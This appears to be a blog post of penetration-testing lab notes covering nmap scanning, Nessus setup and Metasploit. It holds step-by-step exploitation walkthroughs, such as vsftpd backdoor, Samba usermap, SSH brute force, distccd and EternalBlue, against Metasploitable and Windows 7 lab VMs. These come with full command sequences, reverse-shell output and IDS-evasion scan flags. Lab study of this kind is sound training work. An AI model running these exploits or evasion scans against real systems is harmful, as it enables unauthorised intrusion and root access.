Penetration Testing with Kali Linux: Advanced Techniques and Tools

Delving deep into the realm of cybersecurity, this article explores advanced penetration testing techniques using Kali Linux, the premier platform for ethical hacking and network security assessments.

Setting Up Kali Linux for Penetration Testing

Install Kali Linux in a VirtualBox environment, optimized for network penetration testing, and configure it for maximum efficiency and data gathering capabilities.

Advanced Penetration Testing Tools

Utilize a suite of sophisticated tools available in Kali Linux, tailored for comprehensive penetration testing and network vulnerability assessments.

Integrating OSINT in Penetration Testing

Enhance your penetration testing strategy with Open Source Intelligence (OSINT) tools, crucial for in-depth data analysis and reconnaissance.

Essential Linux Commands for Penetration Testers

Master the command line in Kali Linux, deploying a series of critical commands for effective network scanning and vulnerability exploitation.

Simulating Real-World Exploits

Understand real-world exploit scenarios by setting up vulnerable virtual machines and employing various attack strategies to exploit these systems.

Metasploit Framework: A Penetration Tester’s Arsenal

Explore the functionalities of the Metasploit Framework, a powerful tool for developing, testing, and executing exploit code against a remote target machine.

Additional Resources for Penetration Testing

Access a curated list of resources, tutorials, and guides to enhance your skills in penetration testing and stay updated with the latest trends and techniques.

Resources:

Steps:

Install Kali into Virtual box and configure the network to Bridge mode

Tools:

use https://ipinfo.info/ to get the IP adrress of a specific website
use https://hunter.io/ to identify emails addresses associated with a domain
use github to other tools | example: git clone https://github.com/Tuhinshubhra/RED_HAWK
use this link to get a list of top 25 OSINT open source intelligence tools: https://securitytrails.com/blog/osint-tools
use this tool to gather emails associated with a domain 100 links configurable (https://) email-scarper.py

Notes:

MAC Address tels you who you are and the IP adress tells you where you are

Commands:

use sudo to execute commands as root | sudo su | exit to return to user
print working directory – pwd
use ls to list al the contents of a directory ls -al
use touch to create a new file
use cat to read the contents of a file
use echo to insert text into a file: echo Today is a really good day > testfile
use nano as a text editor
use mkdir to create a Directoy/Folder
use mv to move files: move file folder
use cp -p to copy files
use rm -R to remove recursively inside directories rm * -r
use ifconfig to get the netwrok interfaces and the IP address assigned to the interfaces
use nslookup to identify the IP address of a specific website
use whois to identify the details about a domain name
use whatweb 192.168.1.0-192.168.1.255 –aggression 3 -v –no-error –log-verbose=FILE to identify the technologies used on a website – https://tools.kali.org/web-applications/whatweb
use clear to clear the terminal
use theHarvester -d cogeanu.com -b google to get emails addresses associated with a website

Vulnerable Machines for your Lab:

Tools:

Self developed portscanner.py tool

Commands:

use sudo netdiscover to list all the active hosts in your network
use netstat -nr to discover the Router/Gateway
use nmap 192.168.1.1/24 to scan the entire network for open ports
use sudo nmap -sS 192.168.1.2 for a TCP syn scan, where the kali machine does not open a full tcp connection, only the first of the 3 way handshake.
use sudo nmap -sU 192.168.1.2 for an UDP scan
use sudo nmap -O 192.168.1.2 to get the operrationg system running on the target machine
use sudo nmap -sV — version-intensity 9 192.168.1.2 to discover the software version running on an open port with increased intensity
use sudo nmap -sV 192.168.222.127 -p- for a scan of all 65536 ports on a tager machine
use sudo nmap -A 192.168.1.2 (aggressive) enables some advanced features of nmap, OS and version detection included
use nmap -sn 192.168.1.1/24 to check which hosts are UP
use nmap -p 80,22 192.168.1.1 to check for a specific port details on the target host, in this case port 22 and port 80
use nmap -p 1-65635 192.168.1.1 to check for a range of ports
use nmap -F 192.168.1.1 to scan the TOP 100 ports (usually most used, not 1 to 100)
use sudo nmap -f 192.168.1.1 to send tiny (8 byte) fragmented packages to avoid detection of a firewall or IDS (3 packets for a 24 byte header)
use sudo nmap -f -f 192.168.1.1 to split the package into 16 bytes per fragment
use sudo nmap -D 192.168.1.2,192.168.1.3,192.168.1.5,ME 192.168.1.targetIP to use multiple local IP addresses to scan the target as a decoy
use sudo nmap -sD 192.168.1.1 >> outputofscan.txt to write in a given file the output (with no output to the terminal)
use /usr/share/nmap/scripts/ sudo nmap — script auth 192.168.1.1 -sS to use an entire category of scripts against the target (metasploitable) (found tomcat:tomcat on port 8180)
use /usr/share/nmap/scripts/ sudo nmap — script malware 192.168.1.1 -sS to check if the target machine is infected by malware
use /usr/share/nmap/scripts/ sudo nmap — script banner 192.168.1.1 -sS to check if the message (usually holds information disclosure – exact version of the software running on that port) sent by an open port on the target machine
use /usr/share/nmap/scripts/ sudo nmap — script exploit 192.168.1.1 -sS that aims to actively exploit some vulnerability (port 21 ftp user:root pass: root)
use /usr/share/nmap/scripts/ sudo nmap — script-help firewall-bypass.nse to get details about what a certain scrip is able to do
use /usr/share/nmap/scripts/ sudo nmap — script firewall-bypass.nse 192.168.1.1 to execute the above mentioned script
use ftp 192.168.1.1 to ftp connect to the target machine (anonymous | password123) (help to help | exit to exit)
use sudo nmap -sV 192.168.1.2 to discover the software version running on an open port (default intensity is 7) and then simply google the software ant the version + exploit (example: VSFTPD v2.3.4 Backdoor Command Execution – https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/) or (apache httpd 2.2.8 exploit – https://charlesreid1.com/wiki/Metasploitable/Apache | https://www.cvedetails.com/vulnerability-list.php?vendor_id=45&product_id=66&version_id=416233)
use searchsploit UnrealIRCd to find into KALI linux exploit library of tools that could be used
use locate 49757.py to find the location of this script that will be usable to exloit a vulnerability identifies by the command above “searchsploit“

Notes:

use sudo nmap -sS 192.168.1.2 instead of nmap -sT 192.168.1.2 as the first one leave less traces available on a system. -sT make more noise on the target machine

Resources:

use cd /usr/share/nmap/scripts/ for a full list of nmap scripts that could help with target scanning | described here: https://nmap.org/book/nse-usage.html

Tools:

use this pdf document – nmap_cheatsheet_v_1.01

Setup and Configuration:

Download Nessus Essentials 8.15.1 from: https://www.tenable.com/downloads/nessus
choose: Nessus-8.15.1-debian6_amd64.deb | Debian 9, 10 / Kali Linux 1, 2017.3, 2018, 2019, 2020 AMD64
to install, open terminal in the Download directory and type: sudo dpkg -i Nessus-8.15.1-debian6_amd64.deb
after installation to start Nessus: sudo /bin/systemctl start nessusd.service
to use Nessus, browser: https://kali:8834/ (Accept the browser warnings)
register with name and business email (real) so that you can receive the single use Serial Number (recommended to obtain the SN using the webpage request process)
with the SN received in email continue the setup process
setup a new username and password
after all this expect 1 hoour of downloading and compiling the required modules (I suggest to temporary allocate more ram and vcpu to the kali vm :D )

Usage:

Click on “new scan” buton
with the free version you can only scan 16 IP addresses (this will reset after 90 days)
on Basic Tab select “Basic Network Scan” in name: Metasploitable and in Targets insert the IP addrss of the Metasploitable vm
on Discovery tab select Scan type: Port scan (all ports)
on Assessement tab select Scan for known web vulnerabilities – or a more intensive option
Click Save and then Launch it by clicking the Play symbol

path to metasplot framework: cd /usr/share/metasploit-framework/

7 Modules metasploit framework contains:

exploits (buffer overflow, code injection, web application)
auxiliary (does not execute a payload as an explot module does, but istead it is used to perform different actions such as scanning, fuzzing or denial of service attack. Information gateringand, fingerprinting, scanning )
post (used as the name, after exploiting the target, gather or steal information from target device: files, saved passwords, dumping hashes, enummerationg services and applications on the target)
payloads (deliver to the target with and exploit in order to control the machine: singles are payloads that are completly stand alone | stagers are estting up a network connection between the attacker and the victim, are small and reliable (bind or reverse (almost all the time we will use reverse tcp) ) | stages are payload components that are downloaded by stagers modules, can provide advanced features with no size limit example: meterpreters shells (mallware, trojan or virus) that can download files, upload files, record microphone, run webcam, take screenshots, etc)
encoders (helps evade antivirus detection)
evasion (similat ro encoders, mainly designed to evade windows defender)
nops (no-operation is an instruction for the processor to do nothing, useful in buffer overflow to allocate a lot of space in memory before the payload executes)

msfconsole and msfvenom

To run metasplot framework simply run msfconsole in the terminal

use show payloads command to list all the payloads

to use a certain exploit use the command: use followed by the name of the module, example: msf6 > use payload/windows/x64/shell/bind_tcp_rc4
use show info to get more details about what the particular module exploit can do
use show options to understand what the module needs to function
use set <parameter name> example LHOST to change the default already configured IP address
using show payloads again will now not list again all the payloads but rather just the ones that are compatible with the ceratl selected explot
use set payload <payload name> t change the default selected payload with another one you have chosen
use show targets to get a full list of targets that we can exploit using this attack
use set target 3 to select the 3rd option listed by running the command above
use exploit to enable/run the exploit

Example 1 – vsftpd 2.3.4

check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
let’s choose the FTP port: 21/tcp open ftp vsftpd 2.3.4
the goal is to find an explot if this software is vulnerable
as an initial action, before google-ing for possible exploits, you can use metasploit framework
on terminal2: run $ searchsploit vsftpd 2.3.4
on terminal3: run msfconsole and then type: msf6 > search vsftpd
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show info
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.222.127
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show targets

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.222.127:21 – Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.222.127:21 – USER: 331 Please specify the password.
[+] 192.168.222.127:21 – Backdoor service has been spawned, handling…
[+] 192.168.222.127:21 – UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.222.127:6200) at 2021-08-18 17:39:36 -0400

whoami
root
ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:e1:70:b1
inet addr:192.168.222.127 Bcast:192.168.222.2 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fee1:70b1/64 Scope:Link

to exit a shell just type: exit

exit
[*] 192.168.222.127 – Command shell session 1 closed.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

Example 2 – Misconfiguration bindshell

check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
let’s choose the 1524/tcp open bindshell Metasploitable root shell
on terminal2 let’s use a tool called: netcat (a program used to extablish network connections with other machines using both tcp and udp)
to check the help menu run: (mrhacker㉿kali)-[~/Desktop] nc -h
[v1.10-46]
connect to somewhere: nc [-options] hostname port[s] [ports] …
listen for inbound: nc -l -p port [-options] [hostname] [port]
to use it run:

┌──(mrhacker㉿kali)-[~/Desktop]
└─$ nc 192.168.222.127 1524
root@metasploitable:/#

Example 3- telnet

check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
let’s choose the 23/tcp open telnet Linux telnetd
on terminal2: run $ searchsploit Linux telnetd | no real helpful results found
let’s try the default login and username: telnet 192.168.222.127

┌──(mrhacker㉿kali)-[~]
└─$ telnet 192.168.222.127
Trying 192.168.222.127…
Connected to 192.168.222.127.
Escape character is ‘^]’.
_ _ _ _ _ _ ____
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
| ‘_ ` _ \ / _ \ __/ _` / __| ‘_ \| |/ _ \| | __/ _` | ‘_ \| |/ _ \ __) |
| | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
|_|

Warning: Never expose this VM to an untrusted network!
Contact: msfdev[at]metasploit.com
Login with msfadmin/msfadmin to get started

metasploitable login: msfadmin
Password:
Last login: Wed Aug 18 17:19:18 EDT 2021 on tty1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
msfadmin@metasploitable:~$ whoami
msfadmin
msfadmin@metasploitable:~$ sudo su
[sudo] password for msfadmin:
root@metasploitable:/home/msfadmin# whoami
root
root@metasploitable:/home/msfadmin#

Example 4- Samba

check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
let’s choose the 139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
and this one: 445/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
on terminal2: run $ searchsploit Samba | too many results, we need to narrow it down
on terminal3: run $ msfconsole | and then run: msf6 > search samba | some results, but not the ones that we are looking for
let’s then try: msf6 > use auxiliary/scanner/smb/ and try this module: 12 auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > show info
msf6 auxiliary(scanner/smb/smb_version) > show options
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.222.127
msf6 auxiliary(scanner/smb/smb_version) > exploit
valuable output identified: [*] 192.168.222.127:445 – Host could not be identified: Unix (Samba 3.0.20-Debian)
on terminal2: run $ searchsploit Samba 3.0.20 | excluding all the txt files and the py files we are left with only one valid option: Samba 3.0.20 < 3.0.25rc3 – ‘Username’ map script’ Command Execution (Metasploit) – unix/remote/16320.rb
on terminal2: run $ search Samba | now we know that we are interested in: 8 exploit/multi/samba/usermap_script
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(multi/samba/usermap_script) > show info
msf6 exploit(multi/samba/usermap_script) > show options
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.222.127
RHOSTS => 192.168.222.127
msf6 exploit(multi/samba/usermap_script) > run[*] Started reverse TCP handler on 192.168.222.59:4444
[*] Command shell session 1 opened (192.168.222.59:4444 -> 192.168.222.127:34804) at 2021-08-19 05:29:39 -0400whoami
root

Example 5- Buteforce SSH Attack

check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
let’s choose this one again: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
on terminal2: msf6 > search ssh | out of the long list let’s select this one: 45 auxiliary/scanner/ssh/ssh_login
msf6 > use auxiliary/scanner/ssh/ssh_login
on terminal3: /home/mrhacker/Desktop/ nano usernames.txt | type inside a few possile usernames but also containing the corect one: admin, root, toor, user123, msfadmin, admin123 | one per line
on terminal3: /home/mrhacker/Desktop/ nano passwords.txt | type inside a few possile usernames but also containing the corect one: password, password123, helloworld, msfadmin, test1234 | one per line
on terminal2: msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /home/mrhacker/Desktop/passwords.txt
PASS_FILE => /home/mrhacker/Desktop/passwords.txt
on terminal2: msf6 auxiliary(scanner/ssh/ssh_login) > set USER_FILE /home/mrhacker/Desktop/usernames.txt
USER_FILE => /home/mrhacker/Desktop/usernames.txt
on terminal2: msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.222.127
RHOSTS => 192.168.222.127
on terminal2: msf6 auxiliary(scanner/ssh/ssh_login) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(scanner/ssh/ssh_login) > exploit
[+] 192.168.222.127:22 – Success: ‘msfadmin:msfadmin’ ‘uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux ‘
[*] Command shell session 1 opened (192.168.222.59:33103 -> 192.168.222.127:22) at 2021-08-19 06:29:09 -0400
[-] 192.168.222.127:22 – Failed: ‘admin123:password’
msf6 auxiliary(scanner/ssh/ssh_login) > sessions
msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 1
[*] Starting interaction with 1…whoami
msfadmin
sudo su
[sudo] password for msfadmin: msfadminwhoami
root
as we now have the username and passowrd we could ssh into the machine using the discuvered username and password: msfadmin/msfadmin
┌──(mrhacker㉿kali)-[~]
└─$ ssh [email protected]
[email protected]’s password:
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

Example 6 – distccd

check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
let’s try this one: 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
on terminal2: msfconsole and the run: msf6 > search distc | only one record found: exploit/unix/misc/distcc_exec
msf6 > use exploit/unix/misc/distcc_exec
msf6 exploit(unix/misc/distcc_exec) > show options
msf6 exploit(unix/misc/distcc_exec) > set RHOSTS 192.168.222.127 (remote host)
msf6 exploit(unix/misc/distcc_exec) > show payloads
msf6 exploit(unix/misc/distcc_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(unix/misc/distcc_exec) > set LHOST 192.168.222.59 (listenig host)
LHOST => 192.168.222.59
msf6 exploit(unix/misc/distcc_exec) > exploit[*] Started reverse TCP double handler on 192.168.222.59:4444
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo 9JUz23ZkTBY4MuQx;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “9JUz23ZkTBY4MuQx\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened (192.168.222.59:4444 -> 192.168.222.127:50819) at 2021-08-19 10:37:49 -0400whoami
daemon
hostname
metasploitable
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Example 7 – distccd

check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
let’s try these ones: 6667/tcp open irc UnrealIRCd | 6697/tcp open irc UnrealIRCd
on terminal2: (mrhacker㉿kali)-[~/Desktop] $ searchsploit irc | too many findings
on terminal2: (mrhacker㉿kali)-[~/Desktop] $ searchsploit UnrealIRCd | just 4 findings, and only one Ruby: UnrealIRCd 3.2.8.1 – Backdoor Command Execution (Metasploit) linux/remote/16922.rb
on terminal3: msfconsole and the run: msf6 > search UnrealIRCd
msf6 > use 0
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 192.168.222.127
RHOSTS => 192.168.222.127
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show info
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.222.59 netmask 255.255.255.0 broadcast 192.168.222.255
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST 192.168.222.59
LHOST => 192.168.222.59
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit[*] Started reverse TCP double handler on 192.168.222.59:4444
[*] 192.168.222.127:6667 – Connected to 192.168.222.127:6667…
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname…
[*] 192.168.222.127:6667 – Sending backdoor command…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo FtAIdHWFZQ9qDwWD;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “FtAIdHWFZQ9qDwWD\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened (192.168.222.59:4444 -> 192.168.222.127:44450) at 2021-08-19 10:52:15 -0400whoami
roothostname
metasploitable
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Example 8 – drb

check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
let’s try this one : 8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
on terminal2: (mrhacker㉿kali)-[~/Desktop] $ searchsploit drb | too many findings
on terminal3: msfconsole and the run: msf6 > search drb
msf6 > use exploit/linux/misc/drb_remote_codeexec
(this ruby file was removed from kali-linux-2021.2 | still available in kali-linux-2020.2)

Example 9 – vnc

check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
let’s try this one : 5900/tcp open vnc VNC (protocol 3.3)
on terminal2: (mrhacker㉿kali)-[~/Desktop] $ searchsploit vnc | too many findings
on terminal3: msfconsole and the run: msf6 > search vnc
this one looks interesting: exploit/multi/vnc/vnc_keyboard_exec | but the payload is one for Windows and it will not work
let’s try to connect to VNC on the target machine:
(mrhacker㉿kali)-[~/Desktop] $ vncviewer 192.168.222.127
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password: password | the password was password
Authentication successful

Example 10- java-rmi

check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
let’s try this one : 1099/tcp open java-rmi GNU Classpath grmiregistry
on terminal2: msfconsole and the run: msf6 > search java rmi
msf6 > use exploit/multi/misc/java_rmi_server
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/misc/java_rmi_server) > show options
msf6 exploit(multi/misc/java_rmi_server) > set RHOSTS 192.168.222.127
msf6 exploit(multi/misc/java_rmi_server) > run
msf6 exploit(multi/misc/java_rmi_server) > show sessions
msf6 exploit(multi/misc/java_rmi_server) > sessions -i 1
meterpreter > help
meterpreter > shell
Process 1 created.
Channel 1 created.
whoami
root

Example 11 – Windows 7 x64 – Eternalblue NSA-developed Explot

check the IP address of the Windows 7 x64 virtual machine ipconfig: 192.168.222.205
on terminal1: run sudo nmap -sS 192.168.222.205
let’s try these ones: 139/tcp open netbios-ssn and 445/tcp open microsoft-ds
on terminal2: msfconsole and then run msf6 > search eternalblue
let’s use this one to test if the target is vulnerable: “auxiliary/scanner/smb/smb_ms17_010”
msf6 > use 4
msf6 auxiliary(scanner/smb/smb_ms17_010) > show info
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.222.205RHOSTS => 192.168.222.205
msf6 auxiliary(scanner/smb/smb_ms17_010) >[+] 192.168.222.205:445 – Host is likely VULNERABLE to MS17-010! – Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.222.205:445 – Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >
on terminal2: msfconsole and then run msf6 > search eternalblue
let’s use this one to test if the target is vulnerable: “exploit/windows/smb/ms17_010_eternalblue”
msf6 > use 0
msf6 exploit(windows/smb/ms17_010_eternalblue) > show info
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.222.205
RHOSTS => 192.168.222.205
msf6 exploit(windows/smb/ms17_010_eternalblue) > run[*] Started reverse TCP handler on 192.168.222.59:4444
[*] 192.168.222.205:445 – Executing automatic check (disable AutoCheck to override)
[*] 192.168.222.205:445 – Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.222.205:445 – Host is likely VULNERABLE to MS17-010! – Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.222.205:445 – Scanned 1 of 1 hosts (100% complete)
[+] 192.168.222.205:445 – The target is vulnerable.
[*] 192.168.222.205:445 – Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.222.205:445 – Host is likely VULNERABLE to MS17-010! – Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.222.205:445 – Scanned 1 of 1 hosts (100% complete)
[*] 192.168.222.205:445 – Connecting to target for exploitation.
[+] 192.168.222.205:445 – Connection established for exploitation.
[+] 192.168.222.205:445 – Target OS selected valid for OS indicated by SMB reply
[*] 192.168.222.205:445 – CORE raw buffer dump (38 bytes)
[*] 192.168.222.205:445 – 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.222.205:445 – 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.222.205:445 – 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.222.205:445 – Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.222.205:445 – Trying exploit with 12 Groom Allocations.
[*] 192.168.222.205:445 – Sending all but last fragment of exploit packet
[*] 192.168.222.205:445 – Starting non-paged pool grooming
[+] 192.168.222.205:445 – Sending SMBv2 buffers
[+] 192.168.222.205:445 – Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.222.205:445 – Sending final SMBv2 buffers.
[*] 192.168.222.205:445 – Sending last fragment of exploit packet!
[*] 192.168.222.205:445 – Receiving response from exploit packet
[+] 192.168.222.205:445 – ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.222.205:445 – Sending egg to corrupted connection.
[*] 192.168.222.205:445 – Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.222.205
[+] 192.168.222.205:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.222.205:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.222.205:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (192.168.222.59:4444 -> 192.168.222.205:49166) at 2021-08-19 12:33:18 -0400meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > help

Top 5 This Week

Related Posts

Penetration Testing Kali Linux

Penetration Testing with Kali Linux: Advanced Techniques and Tools

Setting Up Kali Linux for Penetration Testing

Advanced Penetration Testing Tools

Integrating OSINT in Penetration Testing

Essential Linux Commands for Penetration Testers

Simulating Real-World Exploits

Metasploit Framework: A Penetration Tester’s Arsenal

Additional Resources for Penetration Testing

Resources:

Steps:

Tools:

Links:

Notes:

Commands:

LEAVE A REPLY Cancel reply

Popular Articles

CyberCogeanu

About

Latest Articles

Most Popular

Subscribe